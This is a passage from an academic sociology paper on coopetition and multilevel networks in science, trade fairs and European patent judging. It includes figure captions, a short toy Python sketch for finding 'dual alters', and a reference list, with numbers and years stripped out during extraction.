this catching-up pattern makes sense: only the large and central laboratories have enough resources to help their young postdocs and researchers remain in this highly competitive race. this suggests that characteristics of organizations count more for if performance than characteristics of the individual members who navigate the coopetitive system. size and centrality of their laboratory, as well as its resources, seem to matter more than their own individual centrality in the advice networks in this segment of the profession. thus, organizations influence and dominate the coopetitive learning process, especially in favor of the bfbp with high epistemic status, as well as the lfbp. organizations are that important because they provide resources, functional coordination, but also the social discipline needed to navigate the social processes at hand. (retrospectively, we know that this social system was already in decline: hematologists-immunologists specialized in leukemia still dominated this research field, but the invention of genetic sequencing, then its use by various applied specialties including epidemiological research, was going to extend medical knowledge on solid tumors. napoleon used to say that in politics it is better to be first in one's provincial village than second in paris; in science, it seems to be the opposite.)

one indicator of this social discipline was made available to us thanks to measurement of the perceptions by these researchers of who among the others were their direct competitors. our analyses showed that, under specific conditions, researchers seek advice from, and share experience with, colleagues whom they recognize as direct competitors (lazega et al., ). this was the case almost only among hematologists-immunologists and their laboratories. they were able, more than other specialties, for historical reasons, to turn cutthroat competition into more manageable coopetition, in particular by creating and sustaining this social discipline thanks to the multilevel relational infrastructures mentioned above. the corresponding figure is based on a stochastic blockmodel of two networks (advice and identification of direct competitors), i.e. a model based on probabilities of advice relations between and within blocks conditioned on the presence of direct competitors. in this system, when factoring in the direct competition network jointly analyzed with the advice network among peers, only one social niche was identified as capable of this feat. this single social niche in this system (the central block in the figure) brings together hematologists-immunologists. they were the only researchers whose relational infrastructure was helpful in terms of taming cutthroat competition and turning it into more or less friendly competition, thus facilitating the achievement of important results collectively and individually. this specialty was able to self-organize as a "social niche" (which is a relational infrastructure as defined above) over two generations, a block of scientists that not only brought together researchers with the same relational profile in this milieu, but also was capable of collective action as a cohesive group (bernard et al., ). inside the niche, social discipline was strong enough to keep competitors who shared advice from deliberately trying to mislead other members. in addition to resources, only this social niche of big ponds was able to provide this context and social discipline.

(figure caption: seeking advice and learning from peers identified as direct competitors: managing coopetition with superposed social niches as a collective benefit of multilevel networks. stochastic blockmodel based on the probabilities of advice relations between and within blocks conditioned on presence of direct competitors. the two kinds of links, seeking advice and identifying as a direct competitor, are dependent. in the second block there is a higher proportion of members seeking advice from each other and calling each other direct competitors than in the two other blocks. node size proportional to block size. see 'effects of competition on collective learning in advice networks', social networks, with avner bar-hen, pierre barbillon and sophie donnet.)
cross-level agency, overlaps, strategies and resilience

but are organizations really thicker than individuals as determinants of such achievements? our answer is yes if you measure their effect cross-sectionally, at least at one point in time. only the lfbp with the right relational behavior learn to catch up with the bfbp over time as part of their heavily relational socialization (lazega, ). indeed, variations among the lfbp (especially the young researchers looking for freedom and emancipation, as shown by coromina soler et al., and ziherl et al., ) show that, in such multilevel systems, individual learning strategies matter too, not just their multilevel position. we measure these strategies by looking at the ways in which these scientists manage the overlaps between their own individual network and the network of their organization. we identified four types of overlaps as indicators of multilevel relational strategies: independent (no overlap, the researcher's relationships in the interindividual network are with members of laboratories in which his/her own laboratory does not have relationships at the inter-organizational level); individualist and collectivist have more or less partial overlaps of different sizes; and the fusional strategy means that the researcher, being a good soldier of his/her lab, has relationships in the interindividual network only among members of labs in which his/her own lab has relationships at the inter-organizational level. it is interesting to note that the strategy that characterizes the "winners" in this system (the bfbp and the lfbp) is the individualist strategy. the radical independentist strategy, in particular, seems to be a mistake in this particular context – message for the younger colleagues in the audience. this analysis, as exploratory as it is, strongly suggests that things do not just happen for those in the right place at the right time: individuals in a coopetitive milieu are also strategic in their relational choices. these individual strategies matter in the interplay between levels, but agency and strategy matter particularly over time. a multilevel approach shows in this case that the resilience of personal relationships, i.e. their deliberate maintenance over long periods, explains in part the effectiveness of these strategies, especially when organizations disappear. in our case in point, for many reasons, almost none of the laboratories in which we interviewed these researchers and directors still exist today as organized entities: technology and methods have changed with genetic sequencing and genomics, and turnover of members and directors has created new structures that have replaced the ones we observed.
and nevertheless, the density of co-publication ties between members of this population of researchers is almost as strong years later in as it was in (year of fieldwork). in this case in point, as shown by the comparison, in figure , between the density of the co-publication networks among these scientists in and in , the resilience of personal coworkers’ relationships is impressive. in total, years after fieldwork, all laboratories had disappeared as organized entities, and researchers were in different laboratories. but they still published together, in part with the same colleagues as in . to put it in a simplified way: combined collective learning and personal ties last long after organizations that brought these scientists together disappear. this “long” term resilience of personal co- publication ties, combined with strategies of invest- ment in social discipline and relational infra structures, pay off. this observation limits very much the idea that organizational characteristics have more effect on performance than individual characteristics and agency in this context. the opportunity structure represented by organizations needs personalized ties within this milieu in order to become an important asset and determinant of performance. but one has to look at this effect over time to realize it. position and agency combined in extended opportunity structures: discreet kinds of inequalities if both position and agency matter separately, how do they matter together as determinants of individual performance in this setting? another way in which organizations matter, in addition to providing direct access to resources and a form of social discipline, is in their capacity and willingness to extend the opportunity structure of their members. this means rewarding (from the perspective of the director/ manager of the organization) their members who select the “right” multilevel relational strategies and align with the multilevel relational infrastructures. which of the three strategies that maintain an overlap between the inter-individual and the inter-organizational networks is rewarded by which manager is an underexplored research question. indeed, one more reason why organizations are somewhat thicker than individuals when we look at determinants of this kind of performance is that they can extend members’ opportunity structures by providing access to what we call dual alters, especially dual alters with complementary resources. we have coined the added value for performance derived from indirect, multilevel, manager-enhanced access to resources accruing from an extended opportunity figure : the “long” term resilience of inter-individual collaboration ties over years, long after the different organizations in which they worked have disappeared. (bar-hen & lazega, forthcoming). embarked on social processes in dynamic and multilevel networks structure “network lift from dual alters” (lazega et al., ). we call dual alters actors in the system whom the focal actor does not reach on his/her own, but who can be introduced to the focal actor by his/her director/manager. as shown in figure , network lift from dual alters is equivalent to closing a multilevel -path. when directors/managers share relational capital to give access to dual alters, their members’ performance increases – especially when the dual alters are rich with resources complementary to that of the focal actor. when this occurs, the lfbp catch up with the bfbp. figure visualizes the potential that dual alters represent. 
it shows all the dual alters with complementary resources accessible to researchers for coopetitive learning and collaborations through their inter-organizational ties. it is interesting to notice that a share of the bfsp are both directors and researchers closing these multilevel paths for others, while their if scores still decrease over time. one interpretation of this effect could be that their commitment to their laboratory as a whole comes with this individual cost, since they no longer work for themselves but for the collective.

(figure caption: how can inter-organizational ties be that important to members' multilevel status? dual alter-induced relational capital is accessed thanks to the closing of multilevel paths, providing an extended opportunity structure: "network lift" from "dual alters" and a multilevel matthew effect. the nodes pictured are researcher i, his/her director, another organization's director, and dual alter k. these ties also provide a social discipline across organizational boundaries, a discipline that makes it possible to seek advice from direct competitors (otherwise risky). see 'network lift from dual alters', european sociological review, with marie jourda and lise mounier.)

(figure caption: a potential to realize through multilevel paths: picture of all dual alters (in red) accessible to researchers (in green) for coopetitive learning and collaborations through their inter-organizational ties (in blue). green nodes are actors i. the first circle of blue nodes are organizations in which actors i are affiliated. the second circle of blue nodes are organizations with which first-circle blue nodes are connected. red nodes are dual alters accessible to members (green nodes i) through inter-organizational networks. for the clarity of the picture, ties among members i (whether as focal actors or as dual alters) are not visualized. see 'network lift from dual alters', european sociological review, with marie jourda and lise mounier.)

it is worth mentioning that this effect increases when we take into account an additional level, i.e. the personal collaboration team of the researcher and its characteristics (lazega and jourda, ). we then have the following different levels: the first level is the focal researcher's personal collaboration team represented as an ego network (as in burt's and burt and merluzzi's "within group" entity); the second level is the complete advice network between all focal researchers in the field; and the third level is the inter-organizational network of laboratories in which these focal researchers are affiliated. the more dual alters with complementary resources one can reach and exchange with, and the denser the collaboration ego network, the higher the performance, because the more likely the focal actor is to benefit from the equivalent of a multilevel matthew effect. indeed, in multilevel systems, directors/managers can induce access to dual alters by closing such multilevel paths. thus network lift from dual alters is not only created by closing such complex paths; it is also derived from a specific kind of cumulative advantage. we pictured this multilevel matthew effect with a paraglider with three levels (lazega and jourda, ). incidentally, one of the questions one could ask in business schools is why managers do not create this connection with dual alters for their subordinates more often. the answer might be that this extension of the opportunity structures of subordinates requires that managers do not perceive their relationship with their subordinates as cutthroat competitive.
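to fix ideas on what closing such a multilevel path means in terms of data, the following toy sketch (our own illustration, with invented matrices, not data from the study) enumerates, for one focal researcher, the dual alters he or she does not reach directly in the advice network but whose laboratory is tied to his or her own laboratory at the inter-organizational level:

import numpy as np

# toy data (invented): advice ties among five researchers, resource ties among
# three laboratories, and the laboratory of each researcher
advice = np.zeros((5, 5), dtype=int)
advice[0, 1] = 1                       # researcher 0 already reaches researcher 1 directly
org_ties = np.zeros((3, 3), dtype=int)
org_ties[0, 1] = org_ties[1, 0] = 1    # laboratory 0 exchanges resources with laboratory 1
lab_of = np.array([0, 0, 1, 1, 2])

def dual_alters(focal):
    """researchers whom the focal actor does not reach directly in the advice
    network, but whose laboratory is tied to the focal actor's own laboratory."""
    own_lab = lab_of[focal]
    reachable_labs = set(np.flatnonzero(org_ties[own_lab]))
    return [k for k in range(len(lab_of))
            if k != focal and advice[focal, k] == 0 and lab_of[k] in reachable_labs]

print(dual_alters(0))  # [2, 3]: members of laboratory 1 that researcher 0 does not yet reach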
the combination of specific multilevel relational strategies by individual members and the closing of multilevel -paths by the manager can transform a latent, extended opportunity structure, into a social process that is a collective asset shared and useful to navigate the coopetitive learning process. this special dimension of opportunity structures, which we call extended opportunity structures, thus matters for navigating social processes on multilevel, socio- organizational networks. multilevel temporalities and synchronizations our second example is a study of collective learning and coopetitive survival in business , in particular among sales representatives with precarious jobs in a trade fair for regional buyers and global sellers of television programs. economists of culture show that this global industry is structured as an “oligopoly with fringes.” a small number of large multinational firms, the majors, dominate the global market using scorched-earth tactics. they empty the pockets of the largest clients, for example by selling new and successful series, such as – at the time – “the borgia,” while giving away for free, as an extra, enough hours of mickey mouse to fill the broadcasters’ grids for three hours per afternoon for an entire year. such tactics undermine the official market where thousands of smaller producers with new and creative programs have to fight for leftover crumbs. looking at this market as a multilevel structure based on the linked design helps visualize it as in figure . brailly et al. ( ) and favre et al. ( ) figure : a trade fair as epistemic and economic space represented with multilevel networks of coopetitive learning among sales representatives for contracting companies. result of successive visualizations by julien brailly, saint-clair chabert-liddell and david schoch of a discussion network among sales representatives during year (lower level) and the contract network signed the following year between the companies in which these sales representatives were affiliated (upper level). many small companies, the units on the outer upper circle, did not sign any contract that year and thus find themselves isolated on this outer upper circle, as if they were watching the economic action driven by the more central companies doing business in the centre. the density of the lower level network represents the “buzz” network of this trade fair. for color codes and for a substantive explanation of this graph, see brailly ( ; brailly et al., ). (see ‘markets as multilevel networks’ ( ) with julien brailly, guillaume favre and josiane chatellet) for a neo-structural economic sociology based on the relational work of entrepreneurs using coopetition to navigate social process in markets, see lazega and mounier ( ) and brailly et al. ( ). embarked on social processes in dynamic and multilevel networks show that it is worth network analyzing in detail how deals for the medium- and small-sized companies are initiated and designed by their respective sales representatives at the trade fair, then later trans- formed into contracts by the companies at the inter-organizational level (bathelt and glückler, ; berends et al., ). fieldwork carried out in one such trade fair shows, for example, that the smaller players survive using multilevel, coopetitive strategies that are not entirely dissimilar to the strategies of the scientists cited above. 
work at inter-individual level is based on personalized and cooperative advice networks (even between sales representatives working for competing companies), whereas work at inter-organizational level is based on competitive contracting networks. brailly ( ) has shown how the little fish survive through coopetitive relational strategies at their inter-individual level. survival from collective learning with coopetitors is based on sharing information at inter-individual level (this shows with triadic closure in ties among sellers) morphing into six-order multilevel, multisided, multiplex sub- structures including individuals and organizations, on the buying and selling sides. in this case of distribution of television programs, the networks reveal different structures and involve different mechanisms of tie formation. but this case also exposes a new dimension of agency in the survival strategies of the little fish, who think multilevel, mobilize multilevel status, and synchronize the different temporalities of the levels in their navigation of the process of coopetitive learning. this specific multilevel management of temporalities is thus another case in point of complementarity between levels. synchronized schedules and time scales (brailly, ) characterize the superposed temporalities of this multilevel system: a short term “see you next time this year” (at different trade fairs) temporality for individuals shows that the more individuals have recently participated in the same events, the more they exchange information with each other. longer term “see you same time next year” (at this same trade fair) temporality for organizations shows that the more organizations participate in the long run in the same events, the more they deal with each other. in this multilevel structure, complementarity and synchronization are both necessary for performance, especially for the survival of smaller sellers (after oligopolistic predatory strategies undermined the market). thus, creating international socio-organizational ties in the context of a globalized markets requires a complex multilevel process that involves and synchronizes both companies and their employees. the structures of different levels strongly influence each other and are interdependent. reframing the embeddedness paradigm with amn seems to be a fruitful approach to understand the globalization of markets. organizational and individual levels are both important in different, complementary and synchronized temporalities in this system. the long- term deal network between companies influences cooperation ties between individuals, which in return can bring new business opportunities and constraints to their companies. these dynamics are likely to be recursive, combining short term and long term temporalities and processes (quintane et al., ). also, although this sharing of leftover crumbs allows smaller players to survive, this is also the story of how big business produces a global cultural order. these coopetitive collective learning processes are at the core of the joint production of global cultural homogenization. multilevel agency in institutionalization processes this multilevel approach to organized collective agency is equivalent to a form of contextualization of networks, behavior and social processes. it has also led back to a basic sociological insight predating network analyses. 
just like micro, meso- and macro-levels of society, levels in the decomposition of networks (from dyads to morphology) cannot be linked purely mechanically. levels of collective agency are linked by the strategic efforts of actors to structure the context of their actions and interactions at all levels, including at the macro level of society. therefore we have argued that the contextualization of networks cannot be construed without a theory of politics. in fact identification and interpretation of multilevel relational infrastructures is intrinsic to politics. this can be shown, for example, with institutionalization processes, where actors as institutional entrepreneurs participate in normative controversies to structure the contexts of their interactions and thus to manage, for example, their cooperation dilemmas. what we call a neo-structural institutionalism explores how multilevel structure, culture and agency come together as different dimensions of these politics. this multilevel contextualization of networks and behavior has stressed overlooked structural dimensions in the structural study of politics, social change and innovation, for example by stressing the role of status inconsistencies, of collegial oligarchies, of the rhetoric of sacrifice in the management of losers, etc. (lazega, , ). more generally, in a whitian spirit, further analyses can focus on organized mobility and relational turnover (omrt) as determinants of the connections social processes that can be modeled with multilevel social network analyses. such phenomena also help contextualize social networks. therefore, our third example addresses this issue directly by studying collective learning and coopetition among institutional entrepreneurs. the latter are european judges participating in a form of elitist “social movement” lobbying to create a european transnational court to institutionalize a european-level intellectual property regime, especially for patents. these judges got involved in this political process of institution building because they saw it as their duty as citizens to participate in the construction of a new european-level legal regime for intellectual property, after politicians and governments tried and failed to do so. for other examples of such discreet regulators, especially in finance and the judiciary, (see huault et al., ; lazega and mounier, ). indeed, european governments had created a european patent in , but had failed to create the transnational court that would enforce this legal instrument by relying on a common interpretation of this european patent. the judges thought that this failure weakened europe’s capacity to innovate. it allowed large transnational companies and entire industries with patents at the core of their business model (such as the pharmaceutical and biotech industry, the semiconductors’ and digital industries, etc.) to instrumentalize the courts, engage in forum shopping (i.e. selecting the national courts and judges most favorable to their preferred outcome, case by case), and use long-lasting “zombie” patents. powerful organizations, such as a (non-eu) public/ private agency, the european patent office (epo), supported this specialized and elitist social movement. this institution awards patents to business – but is also sole regulator of this system in the absence of the transnational court. it operates with/under international private law, not eu law. 
a professional association, the european patent lawyers association as well as a high- level official in the brussels administration (who later became responsible for the legal department at epo) were also involved. judges, lawyers and members of epo assembled at the so-called venice forum (vf) where we collected network data in – in addition to data on perceptions, opinions and normative choices. we measured several social networks of these judges: discussion, reading decisions made by colleagues across borders, citation of decisions made by colleagues across borders in one’s own decisions; and finally recognition of european colleagues considered to be ex ante leaders personifying the future european uniform position on patents. the latter were expected to become members of the court of appeals of this jurisdiction, generating substantive interpretation of patent law and jurisprudence on which european judges would eventually align. note that this collegial oligarchy of judges, who called themselves a “conclave,” did not include representatives of civil society associations challenging patents as the right way to encourage innovation – raising the issue of “democratic deficit” of such institutionalization processes. this collegial oligarchy of institutional entrepreneurs who were also cross-level actors succeeded in pushing to the creation in of the european unified patent court (upc), a new type of judicial institution still waiting for ratifications by key european national parliaments. this vf social movement also informally selected and lifted the collegial oligarchy of super-central judges in inter-individual networks who acquired the high multilevel status that they needed to work convincingly (from the perspective of their peers) on harmonizing the common legal interpretation of the european patent: clarifying anticipations, freezing expectations, obtaining alignments on cross-level linchpins. these supercentral players are identified in figure mapping the uniform network among them. they were the most eminent among the judges in this “patent conclave,” thus expected to sit on the future court of appeal of the upc once it would become operational. as cross-level linchpins, they had enough multilevel status and the right kind of rhetoric as judicial entrepreneurs to wield influence in this transnational institution building process. here we see similar complementarities, but also conflicts, between levels: indeed in the european judicial architecture, the national judge is always the first level european judge, and national judges assembled in venice were active in their national courts at various levels (from local first level to field-level regulated by supreme courts). thus, in this case, the national judges at the vf were also multistatus, vertical linchpins who punch above their weight in collective agency, especially in regulatory, institutionalization processes (lazega, ). these actors with heterogeneous, high and inconsistent forms of status (i.e. in situations of conflicts of interests) were also thinking multilevel, with relation- ships between levels tense and contradictory, each country having historically developed its own patent law, within its own national innovation system, national legal culture and democratic division of powers. in particular, this example emphasizes the soci- alizing dimension of coopetitive learning, i.e. the fact that this process generates both epistemic and normative alignments. 
drawing on collective learning among themselves, they were getting to know their foreign colleagues and the ways in which they “construe the claims” of litigating parties in their embarked on social processes in dynamic and multilevel networks respective jurisdictions. based on this knowledge, these judges tried to hammer out a “harmonized” legal interpretation of the european patent – although they ended up producing a common, procedural “weak culture” (in breiger’s sense), to start creating alignments and a process of convergence and “harmonization” at the european level (lazega, a; lazega et al., ). note that high multilevel status of super-central judges in collective learning is not transformed into political capital purely mechanically. table shows an erg model of this uniform network, in which figure : the tip of a multilevel institutional iceberg: a collegial oligarchy of institutional entrepreneurs as vertical linchpins involved in coopetitive learning and selection of its ex ante leaders. network map of a eu “patent conclave”, the collegial oligarchy crafting the “european compromise”. mapping the ‘uniform’ network: “who expects whom to represent the future uniform position, if any?”. clarifying anticipations, freezing expectations, obtaining alignments on cross-level linchpins/collegial oligarchy: multistatus german, uk and dutch judges: judges with * are super-central judges. (see “learning from lobbying”, utrecht law review, ) table . winners and losers from heterogeneous types of capitalism in the europe des juges institutionalization process. level : judges level : capitalism block (see ‘collegial oligarchies in transnational institution building’, with eric quintane and sandrine casenaz, social networks , ) connections these “activist” judges who get involved in politics, who share the same rules, and who produce a new private/public transnational institution, do not necessarily look up to the same normative ex ante leaders. belonging to countries characterized by the same kind of capitalism and broadly defined legal culture have no direct effect, on their own, on selecting these normative ex ante leaders. however, the interaction effects of both variables help understand the construction of this collegial oligarchy and the need for observing and testing cross-level dependencies over time. these judges as vertical linchpin institutional entrepreneurs discreetly involved in politics were trying to promote a new private/ public transnational institution (the european upc) and to put the issue on the political agenda of the european commission. understanding their agency requires thinking in terms of dynamics of multilevel networks. whether this political process produces a new europe des juges (dehousse, ) remains to be seen. multispin: contextualizing social processes and dynamics of multilevel networks as suggested by table , the macro level and the meso level contexts jointly matter for coopetitive learning and for the selection of rules to make judicial decisions. the socio-economic and political context needed to catalyze such multilevel network dynamics is no less complex than these dynamics themselves. for example, it provides and sorts personnel (tilly, ), helps select leaders and facilitate their circulation, excludes dissenters, mixes members of different social niches, creates moments of synchronization between the dynamics of several levels influencing each other. 
in the figure below, we represent this context as a multilevel spinning top, or "multispin," a rough metaphor of stability from movement (lazega et al., ; lazega, b, ) and of synchronization in these multilevel network dynamics.

(figure caption: context as multispin providing stability from movement in multilevel relational infrastructures. the multispin (multilevel spinning top) is the direct context of multilevel networks, driving the organized mobility and relational turnover of their members (individuals, organizations, governments); the three levels pictured are the inter-individual, inter-organizational and inter-governmental networks, with a staircase in the shaft for vertical linchpins. see 'organized mobility and relational turnover as context for social mechanisms', in j. glückler, e. lazega & i. hammer (eds), knowledge and networks.)

in this system judges are becoming increasingly central over time as they move across hierarchical levels. they rotate and move across jobs, which creates intense relational turnover. this combined omrt can create upward mobility for vertical linchpins (but also downward mobility for others). in turn, mobility helps create the specific multipositionality-with-status-inconsistency that is associated with the institutionalization of new norms, i.e. participation in institutional change. in this multispin as a (rather rigid) metaphor of the context facilitating the institutionalization of new norms at the transnational level, the network dynamics of selection of ex ante leaders in this collegial oligarchy indicate processes at superposed levels that co-evolve, influence each other and lead to, or undermine, synchronization. this gives us insights into the production of cross-level linchpins but also into the dynamics that push and pull them across levels. notice the stairs in the shaft of the multilevel spinning top, representing upward mobility of vertical linchpins associated with institutionalization of new norms, but also the fact that there are losers in these dynamics of multilevel networks of institutionalization. for the latter, multilevel networks lead to nowhere. the dynamics of bottom-up collegiality promoting cross-level vertical linchpins can also demote them. relative structural stability regardless of membership turnover was identified in judges' advice networks and coopetitive learning using stochastic blockmodeling and siena models (lazega et al., ; lazega et al., ), exposing a cyclical centralization–decentralization–recentralization of advice networks as the stabilization provided by this multispin. this was confirmed at the inter-organizational level by brailly et al. ( ) in the study of the global trade fair, in which clusters of sales representatives participating in the market were unstable over time while clusters of the companies and organizations in which these persons were affiliated were more stable. indeed, high turnover at the interindividual level and the stability of the structure at the interorganizational level could be hypothesized to co-generate each other, often by dumping synchronization costs on individuals (lazega, a). the dynamics of cross-level linchpins becoming increasingly central over time and moving across hierarchical levels to institutionalize new norms across borders show how such multistatus and cross-level actors steer the multilevel structures that help communities navigate obstacles in key social processes.
note that multispin as a metaphor also reminds us that there are many examples of such promotion and navigation processes that exclude political opponents by just making the cost of synchronization between levels too high for them. omrt as determinants of social processes can help filter, close, solidarize, lift and ratchet up a collegial oligarchy at the top. again, the more open at the bottom, the more closed at the top. these promotions can often squander the social capital of the collective. the norms and institutions that they promote may not be considered legitimate if their assumed followers do not participate in their formulation, selection and promotion. dynamic multilevel networks to explore politics in the organizational society in conclusion, the reason social processes can be navigated by relational infrastructures is that these relational infrastructures impose a form of social discipline that shapes the course on these social processes as capital of the collective. acknowledging superposed levels of collective agency and analyzing them separately and jointly focuses the attention on multilevel relational infrastructures that help revisit vertical and horizontal differentiations in society. for example, individuals active at two levels simultaneously, i.e. vertical linchpins with multilevel and inconsistent dimensions of status who punch above their weight in the political process. or multilevel social niches, i.e. combinations of roles played by members of a block of individuals at one level and the roles of a block of organizations at the other level, given affiliation ties. as seen with coopetition, processes at each level influence each other across levels, coevolve and can synchronize – although this synchronization cannot be taken for granted or assumed to be equally costly for all actors across levels. dynamics of multilevel networks is a mindbogglingly complex set of phenomena with many components moving at the same time: different kinds of actors, behaviors, interactions, relationships, attributes such as positions and affiliations, relational infrastructures, social processes, encompassing global contexts creating mobility and inequalities. the three case studies of coopetition in science (multilevel networks of researchers), in business (multilevel networks of sales representatives), and in government (multilevel networks of transnational judges as institutional entrepreneurs) help us explore aspects of this temporal multilevel social order and the implications of this approach for social network analysts today. analyses of relational infrastructures of coopetitive learning in science show that individuals and organizations are equally, but differently, important for creating and sharing new knowledge with key multilevel players. observation of multilevel relational infrastructures of coopetitive learning in business shows that synchronized temporalities of individuals and organizations are key to the building of a new global cultural order using markets. tracking multilevel relational infrastructures in lobbying shows that the construction of institutions also requires what we called “stability from movement,” this time in coopetitive learning, i.e. intense omrt as context for these multilevel relational infrastructures and, with this mobility and turnover, diverse levels of access to law – indeed in many cases too much access to law. 
witnessing success in the deployment of such social processes, we can be led to believe that organizations are more important than individuals. this is only true when our measurements are static; over time, individuals and their personalized relationships matter just as much, with increasing intensity of conflicts and power plays being managed with new cohorts relying on complementarity and synchronization of levels. we are just beginning to explore these dynamics of multilevel relational infrastructures in collective agency, a field of research for the future. as sug- gested by our last illustration, a better knowledge of navigation of social processes with the dynamics of multilevel networks in the organizational society helps to better understand politics and contemporary transitions, especially institutional change in the face of depleted common pool ecological resources (bodin, ) and increasing social inequalities. for example, multilevel relational infrastructures and multilevel network models of navigation of social processes can measure the extent to which democracies have become elitist and unequal, and focus on how powerful elites will behave in the coming transitions. in the context of an organizational and class society, relational data is not data like any other. it can increasingly help big relational tech (brt), i.e. relational data hegemons, identify, coopt or undermine the vertical linchpins and collegial oligarchies that dominate collective learning and connections institutionalization processes in society. social net- works touch deep and we are becoming increasingly transparent to such organizations. the concentration of power that big relational data represents because of its increasing value as indicator of social processes and their multilevel navigation has yet to be understood and to sink in. then, if power must check power, who will check these hegemons (al-amoudi and lazega, )? at least three implications follow from such questions for our academic research. first, the social construction of multilevel extensions of opportunity structures through dual alters is not just decisive for individual destinies; it is also important in the collective, political construction of the micro− meso−macro links. there are no mechanical transitions from the individual, to the dyad, to the triad, etc. until one reaches the collective with its morphological, horizontal and vertical differentiations and structures, such as multidimensional status and division of work. there is no such a mechanical transition without levels in a stratigraphy, and without multilevel strategies, including these selective extensions, in fact without millions of such extensions. these extensions and their consequences are not studied yet in spite of their obvious political importance, for example, in regulatory processes. it will be up to neo-structural sociology to show how they are created, and a special attention could be paid, for example, to how dual alters participate in anyone’s engagement in citizenship and political institutionalization of any new normal. second, evolution of multilevel relational infrastructures and social change drive each other in the organizational society, which is a class society where organizations are “tools with a life of their own” evolving in “dynamic constitutive fields” (selznick, ). in the navigation of social processes, multi- level relational infrastructures can create collegial oligarchies and democratic deficits. 
from “big fish in the big pond” to “cross-level linchpins” to “institutional entrepreneurs,” this often leads to rebuilding ins- titutions and societies through very discreet, techno- cratic, social and institutional engineering (such as finding/recommending/assigning the “right” alters and dual alters for any task). it is therefore part of our responsibility as social scientists to keep identifying these multilevel relational infrastructures and the elites’ ways of managing/navigating the social processes that our societies are made of: solidarities, controls, regulations and learning. for any controversial issue, in all domains, small private collegial oligarchies pop up, selected privately through sifting and lifting by multispins in every field. one of the latest was by a brt company to decide what is fake news, what is angry mood manipulation, and how to deal with them. the more we know about dynamics of multilevel networks as public scientists, the more we will be able to contribute to managing the roller coasters of these social processes in which we are embarked. therefore we need new richer data structures, more powerful network statistics to tests hypotheses on dynamic, multilevel networks. third, one implication of neo-structural research is that we need to keep collecting and criticizing our own social network datasets combining structure, culture and agency (archer, ; reynaud, ; breiger, , ; favereau and lazega, ; grossetti, ; lazega, b), and to develop network literacy along with thorough organizational, ethnographical and qualitative analyses. we should not give up designing our own research on the ground, collecting our own small and multilevel datasets, listening to how people themselves make sense of their actions, relationships, contexts, controversies, etc. if we do not measure and model these processes ourselves, only brt will, and we will no longer be able to understand these processes in the original language. we can keep learning with our small datasets, especially when big relational data is not accessible to scientists in decent conditions. this is the only way to keep the knowledge of social processes public and democratic. a hidden competition is under way between public social sciences and private social sciences to track these realities. following two generations of “governance,” collegial oligarchies of top-down collegiality emerge in many social niches making political decisions without saying so, privately de- signing changes in public institutions, not just in governments and government-related committees. public social scientists and social network analysts should not let this disappear from the sight of the wider public. much remains to be done to be useful in that respect. 
acknowledgments in addition to my special gratitude to lise mounier for many years of research collaboration, i would like to thank co-authors and coworkers in social and organizational network analyses: avner bar- hen, pierre barbillon, germain barré, franck bessis, dominique bouthinon, julien brailly, ulrik brandes, ronald breiger, maria-giuseppina bruna, saint-clair chabert-liddell, josiane chatellet, catherine comet, claude compagnone, bernard conein, sébastien delarre, sophie donnet, fabien eloire, ana maria falconi, olivier favereau, guillaume favre, alexis ferrand, johannes glückler, karima guenfoud, embarked on social processes in dynamic and multilevel networks ingmar hammer, isabelle huault, marie jourda, david krackhardt, david lazega, marie-odile lebeaux, claire lemercier, jaime montes, mohamed oubenal, philippa pattison, elise penalva icher, Álvaro piña- stranger, christophe prieur, eric quintane, chrystelle richard, garry robins, juliette rouchier, guillaume santini, saraï sapulete, silvio salej higgins, tom snijders, henry soldano, rafael stofer, mark tranmer, paola tubaro, marijtje van duijn, marta varanda, stéphane vari, peng wang, olivier wattebled, harrison white and aleš Žiberna. i would also like to thank julien brailly, saint-clair chabert-liddell, maud gellée, alexis gomes matias, jordan laires, jade limacher, yannis rabia, david schoch and françois tang for their work on exploring visualizations of multilevel networks. references agneessens, f. and wittek, r. . where do intra-organizational advice relations come from? the role of informal status and social capital in social exchange. social networks : – . al-amoudi, i. and lazega, e. (eds) . confronting the matrix: post-human institutions and organizations, routledge, london. archer, m. s. . morphogenesis versus structuration: on combining structure and action. british journal of sociology : – . barbillon, p., donnet, s., lazega, e. and bar- hen, a. . stochastic block-models for multiplex networks: an application to a multilevel network of researchers. journal of the royal statistical society: series a (statistics in society) : – . bathelt, h. and glückler, j. . the relational economy: geographies of knowing and learning, oxford university press, oxford. berends, h., van burg, e. and van raaij, e. m. . contacts and contracts: cross-level network dynamics in the development of an aircraft material. organization science : – . bernard, j., dausset, j. with the collaboration of a. hess. . la mosaique humaine. entretien sur les révolutions de la médecine et le devenir de l’homme, calmann-levy, paris. bodin, Ö. . collaborative environmental governance: achieving collective action in social- ecological systems. science : , p.eaan . brailly, j. . dynamics of multi-level networks in trade fairs – a local approach to the cooperation among competitors. journal of economic geography : – . brailly, j., favre, g., chatellet, j. and lazega, e. . embeddedness as a multilevel problem: a case study in economic sociology. social networks : – . brailly, j., comet, c., delarre, s., eloire, f., favre, g., lazega, e., mounier, l., montes-lihn, j., oubenal, m., penalva-icher, e., piña-stranger, Á. and varanda, m. . neo-structural economic sociology beyond embeddedness: relational infrastructures and social processes in markets and market institutions. economic sociology: the european electronic newsletter : – . breiger, r. l. . the duality of persons and groups. social forces : – . breiger, r. l. (ed.) . 
social mobility and social structure, cambridge university press, cambridge. breiger, r. l. . dualities of culture and structure: seeing through cultural holes. in fuhse, j. and mützel, s. (eds), relationale soziologie: zur kulturellen wende der netzwerkforschung, springer verlag, wiesbaden, pp. – . burt, r. s. . brokerage and closure. an introduction to social capital oxford university press, oxford. burt, r. s. and merluzzi, j. . “embedded brokerage: hubs versus locals”, in brass, d. j., labianca, g. (joe), mehra, a., halgin, d. s. and borgatti, stephen p. (eds), research in the sociology of organizations, emerald group publishing limited, pp. – . coleman, j. s. . the asymmetric society, syracuse university press, syracuse, ny. coromina soler, l., coenders, g., ferligoj, a. and guia, j. . phd students’ research group social capital in two countries: a clustering approach with duocentred network measures. metodološki zvezki : – . dehousse, r. . l’europe par le droit. critique internationale : – . eloire, f. . une approche sociologique de la concurrence sur un marché le cas.des restaurateurs lillois. revue française de sociologie, ( ): – . eloire, f., elise penalva-icher et e. lazega . “les réseaux complets en questions: apports et limites de l’analyse des réseaux sociaux en milieu interorganisationnel”, terrains & travaux, : – . fararo, t. j. and doreian, p. . tripartite structural analysis: generalizing the breiger-wilson formalism. social networks : – . favereau, o. and lazega, e. (eds) . conventions and structures in economic organization: markets, networks, and hierarchies, edward elgar publishing, cheltenham. favre, g., brailly, j., chatellet, j. and lazega, e. . inter-organizational network 